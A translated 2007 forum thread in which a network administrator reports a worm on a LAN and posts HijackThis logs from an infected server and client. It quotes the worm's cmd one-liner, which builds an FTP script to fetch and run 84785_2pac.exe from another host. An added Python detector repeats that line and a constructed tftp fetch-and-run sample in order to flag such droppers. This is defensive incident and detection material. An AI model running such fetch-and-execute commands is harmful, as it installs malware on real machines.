
Nasty virus that spreads across a LAN.


Post by padrino » 08/05/07 09:54

Hi everyone.
I have 6 PCs that keep launching DOS windows at the same time.
Then two files and a strange service appear.
I can't figure out what triggers this malicious process that is bogging down 4 clients and two servers :-(


The command that starts automatically is this:

cmd /c echo OPEN 172.20.11.36 6561>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit

The files that get created are:

84785_2pac.exe is often created in a directory on the server.
C:\WINDOWS\system32\dllcache\Updtftpini.exe this one, on the other hand, is created locally.

And on top of that a service is created with this name:

Microsoft windows FTPd

Here is the HijackThis log; if I can, I'll also post a client's log.

Logfile of HijackThis v1.99.1
Scan saved at 10.33.45, on 08/05/2007
Platform: Windows 2003 SP1 (WinNT 5.02.3790)
MSIE: Internet Explorer v7.00 (7.00.6000.16414)

Running processes:
C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmi\IBM\ServeRAID Manager\aqagent.exe
C:\Programmi\IBM\Director\bin\asf\ASFAgent.exe
C:\Programmi\IBM\Director\bin\ibmasfsrv.exe
C:\Programmi\IBM\Director\cimom\bin\BAsfIpM.exe
C:\Programmi\IBM\Director\cimom\bin\cimlistener.exe
C:\WINDOWS\system32\cisvc.exe
C:\WINDOWS\CWBRXD.EXE
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\IBMSA.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Programmi\IBM\Director\bin\slp_srvreg.exe
C:\Programmi\Network Associates\Common Framework\FrameworkService.exe
C:\Programmi\Network Associates\VirusScan\Mcshield.exe
C:\Programmi\Network Associates\VirusScan\VsTskMgr.exe
C:\Programmi\IBM\ServeRAID Manager\miniwinagent.exe
f:\Archidoc\Engine\BIN\RDS.EXE
C:\Programmi\IBM\ServeRAID Manager\RaidServ.exe
C:\Programmi\Siav\e-Dispatcher\edispatcher.exe
C:\Programmi\IBM\Director\cimom\bin\tier1slp.exe
C:\Programmi\IBM\Director\bin\twgipcsv.exe
C:\Programmi\IBM\Director\bin\twgipc.exe
C:\VEXPLITE\viritsvc.exe
C:\Programmi\RealVNC\VNC4\WinVNC4.exe
C:\Programmi\IBM\Director\cimom\bin\wmicimserver.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\twgengsv.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\twgsrvw.exe
C:\WINDOWS\Explorer.EXE
C:\Programmi\IBM\Director\bin\TWGLogEngine.exe
C:\Programmi\Network Associates\VirusScan\SHSTAT.EXE
C:\Programmi\Network Associates\Common Framework\UpdaterUI.exe
C:\Programmi\File comuni\Network Associates\TalkBack\TBMon.exe
C:\VEXPLITE\MONLITE.EXE
C:\Programmi\IBM\Director\bin\twgescli.exe
C:\Programmi\IBM\Director\bin\twgmonit.exe
C:\Programmi\File comuni\Ahead\lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmi\IBM\Director\bin\twgsrvst.exe
C:\WINDOWS\System32\svchost.exe
C:\Programmi\IBM\Director\bin\twgsrvxw.exe
C:\Programmi\Prevx1\PXConsole.exe
C:\Programmi\Prevx1\PXAgent.exe
C:\WINDOWS\system32\cidaemon.exe
C:\WINDOWS\system32\cidaemon.exe
C:\Programmi\Internet Explorer\iexplore.exe
C:\hijackthis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = res://shdoclc.dll/hardAdmin.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = res://shdoclc.dll/hardAdmin.htm
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = C:\WINDOWS\system32\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Malicious Scripts Scanner - {55EA1964-F5E4-4D6A-B9B2-125B37655FCB} - C:\Documents and Settings\All Users\Dati applicazioni\Prevx\pxbho.dll
O4 - HKLM\..\Run: [Tweak UI] RUNDLL32.EXE TWEAKUI.CPL,TweakMeUp
O4 - HKLM\..\Run: [ShStatEXE] "C:\Programmi\Network Associates\VirusScan\SHSTAT.EXE" /STANDALONE
O4 - HKLM\..\Run: [McAfeeUpdaterUI] "C:\Programmi\Network Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
O4 - HKLM\..\Run: [Network Associates Error Reporting Service] "C:\Programmi\File comuni\Network Associates\TalkBack\TBMon.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Programmi\File comuni\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [Client Access Service] "C:\Programmi\IBM\Client Access\cwbsvstr.exe"
O4 - HKLM\..\Run: [Client Access Help Update] "C:\Programmi\IBM\Client Access\cwbinhlp.exe"
O4 - HKLM\..\Run: [Client Access Check Version] "C:\Programmi\IBM\Client Access\cwbckver.exe" LOGIN
O4 - HKLM\..\Run: [Client Access Express Welcome] "C:\Programmi\IBM\Client Access\cwbwlwiz.exe"
O4 - HKLM\..\Run: [VIRIT LITE MONITOR] C:\VEXPLITE\MONLITE.EXE
O4 - HKLM\..\Run: [PrevxOne] "C:\Programmi\Prevx1\PXConsole.exe"
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Programmi\File comuni\Ahead\lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [updateMgr] C:\Programmi\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe AcRdB7_0_5 -reboot 1
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\RunOnce: [FlashPlayerUpdate] C:\WINDOWS\system32\Macromed\Flash\GetFlash.exe
O4 - Global Startup: Avvio veloce di Adobe Reader.lnk = C:\Programmi\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Server status.lnk = C:\Programmi\IBM\Director\bin\twgsrvst.exe
O10 - Broken Internet access because of LSP provider 'c:\documents and settings\administrator.gio2000\windows\system32\mswsock.dll' missing
O11 - Options group: [INTERNATIONAL] International*
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\Software\..\Telephony: DomainName = gio2000.loc
O17 - HKLM\System\CCS\Services\Tcpip\..\{DE0EA623-0478-4907-BD81-C2F196971765}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = gio2000.loc
O20 - Winlogon Notify: dimsntfy - dimsntfy.dll (file missing)
O20 - Winlogon Notify: WgaLogon - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\
O23 - Service: Servizio di verifica compatibilità applicazioni (AeLookupSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Avvisi (Alerter) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio Gateway di livello applicazione (ALG) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Gestione applicazione (AppMgmt) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Application Quiesce Agent (aqagent) - Adaptec - C:\Programmi\IBM\ServeRAID Manager\aqagent.exe
O23 - Service: ASF Agent (ASFAgent) - Intel Corporation - C:\Programmi\IBM\Director\bin\asf\ASFAgent.exe
O23 - Service: AsfSrv - IBM Corporation - C:\Programmi\IBM\Director\bin\ibmasfsrv.exe
O23 - Service: Servizio stato di ASP.NET (aspnet_state) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe (file missing)
O23 - Service: Audio Windows (AudioSrv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Broadcom ASF IP monitoring service v3.0.1 (BAsfIpM) - Broadcom Corp. - C:\Programmi\IBM\Director\cimom\bin\BAsfIpM.exe
O23 - Service: Servizio trasferimento intelligente in background (BITS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Browser di computer (Browser) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: IBM Director CIM Listener (cimlistener) - OpenSource Pegasus - C:\Programmi\IBM\Director\cimom\bin\cimlistener.exe
O23 - Service: Servizio di indicizzazione (CiSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\cisvc.exe (file missing)
O23 - Service: Servizi di crittografia (CryptSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Comando remoto iSeries Access per Windows (Cwbrxd) - IBM Corporation - C:\WINDOWS\CWBRXD.EXE
O23 - Service: Utilità di avvio processi server DCOM (DcomLaunch) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: File system distribuito (Dfs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\Dfssvc.exe (file missing)
O23 - Service: Client DHCP (Dhcp) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio amministrativo di Gestione disco logico (dmadmin) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\dmadmin.exe (file missing)
O23 - Service: Gestione dischi logici (dmserver) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Client DNS (Dnscache) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio di segnalazione errori (ERSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Registro eventi (Eventlog) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\services.exe (file missing)
O23 - Service: Guida in linea e supporto tecnico (helpsvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: HID Input Service (HidServ) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: IBM SLP SA (ibmsa) - IBM Corporation - C:\Programmi\IBM\Director\bin\IBMSA.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmi\File comuni\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: Server (lanmanserver) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Workstation (lanmanworkstation) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Helper NetBIOS di TCP/IP (LmHosts) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Servizio di framework di McAfee (McAfeeFramework) - Network Associates, Inc. - C:\Programmi\Network Associates\Common Framework\FrameworkService.exe
O23 - Service: Network Associates McShield (McShield) - Network Associates, Inc. - C:\Programmi\Network Associates\VirusScan\Mcshield.exe
O23 - Service: Network Associates Task Manager (McTaskManager) - Network Associates, Inc. - C:\Programmi\Network Associates\VirusScan\VsTskMgr.exe
O23 - Service: ServeRAID FlashCopy Agent (miniwinagent) - Unknown owner - C:\Programmi\IBM\ServeRAID Manager\miniwinagent.exe
O23 - Service: Servizio Pubblicazione FTP (MSFtpsvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\inetsrv\inetinfo.exe (file missing)
O23 - Service: Accesso rete (Netlogon) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Connessioni di rete (Netman) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: NLA (Network Location Awareness) (Nla) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Replica file (NtFrs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\ntfrs.exe (file missing)
O23 - Service: Provider supporto protezione LM NT (NtLmSsp) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Archivi rimovibili (NtmsSvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\services.exe (file missing)
O23 - Service: Servizi IPSEC (PolicyAgent) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Prevx Agent (PREVXAgent) - Unknown owner - C:\Programmi\Prevx1\PXAgent.exe" -f (file missing)
O23 - Service: Archiviazione protetta (ProtectedStorage) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Auto Connection Manager di Accesso remoto (RasAuto) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Connection Manager di Accesso remoto (RasMan) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: RDM Server (RDS) - Unknown owner - f:\Archidoc\Engine\BIN\RDS.EXE" RDS (file missing)
O23 - Service: Registro di sistema remoto (RemoteRegistry) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: RPC Locator (RpcLocator) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\locator.exe (file missing)
O23 - Service: RPC (Remote Procedure Call) (RpcSs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Provider Gruppo di criteri risultante (RSoPProv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\RSoPProv.exe (file missing)
O23 - Service: Helper console di amministrazione speciale (sacsvr) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Gestione account di protezione (SAM) (SamSs) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Smart card (SCardSvr) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\SCardSvr.exe (file missing)
O23 - Service: Utilità di pianificazione (Schedule) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Accesso secondario (seclogon) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Notifica eventi di sistema (SENS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: ServeRAID Manager Agent (ServeRAIDManagerAgent) - Adaptec Incorporated - C:\Programmi\IBM\ServeRAID Manager\RaidServ.exe
O23 - Service: Windows Firewall / Condivisione connessione Internet (ICS) (SharedAccess) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Rilevamento hardware shell (ShellHWDetection) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Siav e-Dispatcher - Siav - Soluzioni Informatiche e di Automazione - C:\Programmi\Siav\e-Dispatcher\edispatcher.exe
O23 - Service: Siav Mailbox - Siav - Soluzioni Informatiche e di Automazione - C:\Programmi\Siav\e-Dispatcher\SvMailbox.exe
O23 - Service: Spooler di stampa (Spooler) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\spoolsv.exe (file missing)
O23 - Service: Microsoft Software Shadow Copy Provider (swprv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Avvisi e registri di prestazioni (SysmonLog) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\smlogsvc.exe (file missing)
O23 - Service: Telefonia (TapiSrv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizi terminal (TermService) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: IBM Director Agent SLP Attributes (tier1slp) - IBM Corporation - C:\Programmi\IBM\Director\cimom\bin\tier1slp.exe
O23 - Service: Manutenzione collegamenti distribuiti client (TrkWks) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: IBM Director Support Program (TWGIPC) - IBM Corporation - C:\Programmi\IBM\Director\bin\twgipcsv.exe
O23 - Service: IBM Director Server (TWGSERVER) - IBM Corporation - C:\Programmi\IBM\Director\bin\twgengsv.exe
O23 - Service: Gruppo di continuità (UPS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\ups.exe (file missing)
O23 - Service: Servizio dischi virtuali (vds) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\vds.exe (file missing)
O23 - Service: Virit eXplorer Lite (viritsvclite) - TG Soft Sas http://www.tgsoft.it - C:\VEXPLITE\viritsvc.exe
O23 - Service: Copia shadow del volume (VSS) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\vssvc.exe (file missing)
O23 - Service: Ora di Windows (W32Time) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizio Pubblicazione sul Web (W3SVC) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizio rilevamento automatico proxy WinHTTP (WinHttpAutoProxySvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Strumentazione gestione Windows (winmgmt) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programmi\RealVNC\VNC4\WinVNC4.exe" -service (file missing)
O23 - Service: Portable Media Serial Number Service (WmdmPmSN) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Estensioni driver di Strumentazione gestione Windows (Wmi) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: IBM Director Agent WMI CIM Server (wmicimserver) - IBM Corporation - C:\Programmi\IBM\Director\cimom\bin\wmicimserver.exe
O23 - Service: Aggiornamenti automatici (wuauserv) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\svchost.exe (file missing)
O23 - Service: Configurazione senza fili (WZCSVC) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
O23 - Service: Servizio Provisioning di rete (xmlprov) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)
padrino
Newbie

Posts: 7
Joined: 29/08/06 01:12
Location: Messina
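The one-liner quoted in the post above is the classic inline FTP-script dropper: it writes an ftp command script with `echo`, feeds it to `ftp -n -s:`, runs whatever was fetched, then deletes the script. The following is an added example (not code from the thread or from any tool the poster uses) that pulls the indicators out of such a command line (server, port, script name, payload, and whether the payload is then executed) and runs that check over a process-creation log. It goes beyond the thread's specific case by also recognising the `tftp -i <host> GET <file>` variant of the same technique. The `host|user|command line` record format and all log lines other than the quoted dropper command are constructed for the example.

```python
"""Extract IOCs from an inline FTP/TFTP dropper command line and flag it in process logs."""
import re

# The dropper one-liner quoted in the post above (this one is taken from the thread).
DROPPER_CMD = (
    "cmd /c echo OPEN 172.20.11.36 6561>x&echo GET 84785_2pac.exe>>x"
    "&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit"
)

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
TOKEN = r"([^\s&|>]+)"  # one cmd.exe argument: stops at whitespace, a separator or a redirect
OPEN_RE = re.compile(r"echo\s+open\s+" + IPV4 + r"\s+(\d{1,5})\s*>{1,2}\s*" + TOKEN, re.I)
GET_RE = re.compile(r"echo\s+get\s+" + TOKEN + r"\s*>>\s*" + TOKEN, re.I)
FTP_RE = re.compile(r"\bftp(?:\.exe)?\b[^&|]*?-s:" + TOKEN, re.I)
TFTP_RE = re.compile(r"\btftp(?:\.exe)?\s+-i\s+" + IPV4 + r"\s+get\s+" + TOKEN, re.I)


def _payload_executed(cmdline, payload):
    """True when a later '&'-separated command in the line runs the downloaded file."""
    target = payload.lower()
    for seg in cmdline.lower().split("&"):
        seg = seg.strip()
        if seg.startswith("start "):          # `start payload.exe` counts as execution too
            seg = seg[6:].strip()
        seg = seg.lstrip('"')
        if seg == target or seg.startswith(target + " ") or seg.startswith(target + '"'):
            return True
    return False


def parse_dropper(cmdline):
    """Return the IOCs of an `ftp -s:` or `tftp -i` dropper, or None if the line is not one."""
    m_open, m_ftp = OPEN_RE.search(cmdline), FTP_RE.search(cmdline)
    if m_open and m_ftp and m_ftp.group(1).lower() == m_open.group(3).lower():
        # The script written with `echo OPEN ... > x` must be the one ftp reads back with -s:x
        m_get = GET_RE.search(cmdline)
        payload = m_get.group(1) if m_get else None
        return {"transport": "ftp", "server": m_open.group(1), "port": int(m_open.group(2)),
                "script": m_open.group(3), "payload": payload,
                "executed": bool(payload) and _payload_executed(cmdline, payload)}
    m_tftp = TFTP_RE.search(cmdline)
    if m_tftp:
        payload = m_tftp.group(2)
        return {"transport": "tftp", "server": m_tftp.group(1), "port": 69,
                "script": None, "payload": payload,
                "executed": _payload_executed(cmdline, payload)}
    return None


# Constructed process-creation records (assumed "host|user|command line" format, not from the
# thread); only the first command line is the real one quoted in the post.
SAMPLE_LOG = [
    "SRV01|SYSTEM|" + DROPPER_CMD,
    "PC07|mario|cmd /c dir c:\\temp & exit",
    "PC08|anna|ftp -n -s:c:\\jobs\\nightly.txt",        # scripted ftp without an inline script: benign
    "PC09|SYSTEM|cmd /c tftp -i 172.20.11.36 GET svc.exe&svc.exe",
]


def scan_process_log(records):
    """Return one finding per record whose command line is a dropper."""
    findings = []
    for rec in records:
        host, user, cmd = rec.split("|", 2)
        ioc = parse_dropper(cmd)
        if ioc:
            findings.append({"host": host, "user": user, **ioc})
    return findings


if __name__ == "__main__":
    for hit in scan_process_log(SAMPLE_LOG):
        print(hit)
```

The `server` and `port` fields are what you would block at the switch or host firewall (here 172.20.11.36:6561, which is another machine on the same LAN, so the FTP server the worm installs is the infection source, not an internet host), and `executed` tells you whether the host only staged the file or actually ran it.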


Post by padrino » 09/05/07 11:45

Here are the logs of two infected clients.
These show one extra peculiarity:

Every time I try to go to Control Panel / Add or Remove Programs, a pop-up appears that says "file sentinel" and the path on the server to which it is trying to write.

Client 1:

Logfile of HijackThis v1.99.1
Scan saved at 12.19.29, on 09/05/2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\hidserv.exe
C:\Programmi\McAfee\Common Framework\FrameworkService.exe
C:\Programmi\McAfee\VirusScan Enterprise\Mcshield.exe
C:\Programmi\McAfee\VirusScan Enterprise\VsTskMgr.exe
C:\Programmi\Prevx1\PXAgent.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\Programmi\RealVNC\VNC4\WinVNC4.exe
C:\WINNT\system32\mspmspsv.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\Explorer.EXE
C:\Programmi\Java\jre1.6.0_01\bin\jusched.exe
C:\Programmi\Picasa2\PicasaMediaDetector.exe
C:\Programmi\QuickTime\qttask.exe
C:\Programmi\McAfee\Common Framework\UdaterUI.exe
C:\Programmi\Prevx1\PXConsole.exe
C:\WINNT\system32\internat.exe
C:\Programmi\McAfee\Common Framework\McTray.exe
C:\Programmi\Microsoft Office\Office\MSOFFICE.EXE
C:\Programmi\Microsoft Office\Office\EXCEL.EXE
C:\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Malicious Scripts Scanner - {55EA1964-F5E4-4D6A-B9B2-125B37655FCB} - C:\Documents and Settings\All Users\Dati applicazioni\Prevx\pxbho.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programmi\Java\jre1.6.0_01\bin\ssv.dll
O2 - BHO: scriptproxy - {7DB2D5A0-7241-4E79-B68D-6309F01C5231} - C:\Programmi\McAfee\VirusScan Enterprise\scriptcl.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\system32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [Client Access Service] "C:\Programmi\IBM\Client Access\cwbsvstr.exe"
O4 - HKLM\..\Run: [Client Access Help Update] "C:\Programmi\IBM\Client Access\cwbinhlp.exe"
O4 - HKLM\..\Run: [Client Access Check Version] "C:\Programmi\IBM\Client Access\cwbckver.exe" LOGIN
O4 - HKLM\..\Run: [Client Access Express Welcome] "C:\Programmi\IBM\Client Access\cwbwlwiz.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programmi\Java\jre1.6.0_01\bin\jusched.exe"
O4 - HKLM\..\Run: [Picasa Media Detector] C:\Programmi\Picasa2\PicasaMediaDetector.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Programmi\File comuni\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programmi\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [ShStatEXE] "C:\Programmi\McAfee\VirusScan Enterprise\SHSTAT.EXE" /STANDALONE
O4 - HKLM\..\Run: [McAfeeUpdaterUI] "C:\Programmi\McAfee\Common Framework\UdaterUI.exe" /StartedFromRunKey
O4 - HKLM\..\Run: [PrevxOne] "C:\Programmi\Prevx1\PXConsole.exe"
O4 - HKCU\..\Run: [internat.exe] internat.exe
O4 - Global Startup: as400.lnk = C:\as400.bat
O4 - Global Startup: Avvio veloce di Adobe Reader.lnk = C:\Programmi\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Barra degli strumenti Microsoft Office.lnk = C:\Programmi\Microsoft Office\Office\MSOFFICE.EXE
O4 - Global Startup: CopiaMdw2000.lnk = ProtAcc\CopiaMdw2000.bat
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CCS\Services\Tcpip\..\{A29A4F37-B20F-413E-8D50-DBF4991421AE}: Domain = ********
